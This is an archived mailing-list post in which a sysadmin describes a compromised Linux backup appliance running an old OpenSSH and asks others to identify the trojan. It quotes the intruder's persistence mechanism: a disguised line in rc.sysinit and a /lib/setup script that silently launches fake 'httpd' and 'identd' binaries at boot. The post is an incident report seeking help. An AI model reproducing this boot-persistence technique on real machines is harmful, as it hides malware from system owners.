hacked through ssh

From: John (mcgowan_at_lynch2.com)
Date: 03/09/04

  • Next message: all mail refused: "Re: chroot and re-mounted dirs" 
    Date: 9 Mar 2004 14:30:16 -0800

    I've got a D2D backup applicance that came preinstalled with a version
    of RH Linux. Not sure which version. However I am sure that it is
    running OpenSSH_3.1p1. This machine wouldn't boot up after a power
    (and UPS) failure, and in trying to get it running again we discovered
    that something had been compromised. The machine is behind a
    firewall, but unfortunately I had opened up SSL traffic to the entire
    outside world (to get some remote support from the appliance
    manufacturer). What we discovered today was the following.

    at the bottom of rc.sysinit, the following...
    # installing HTTPD
    /lib/setup

    And /lib/setup looked like this...
    PWD=`pwd`
    cd /lib
    export PATH=.:$PATH
    httpd >/dev/null
    cd /usr/lib
    identd & >/dev/null
    cd "$PWD"

    the httpd executable was also sitting in the lib directory and i
    belive did most of the damage.

    Is anybody familiar with this particular trojan?

    I'm 99% convinced (from searching google for half a day) that this was
    due to the old version of OpenSSH and the fact that I had SSH open up
    to the outside world. But I have not encountered any real proof that
    what I'm looking at came from those mistakes. I already plan on
    completely re-installing the machine in question, but I don't want to
    do that If I have another hole that I'm not aware of that was the real
    source of my troubles.

    /John

  • Next message: all mail refused: "Re: chroot and re-mounted dirs"

    Relevant Pages
    • Quantcast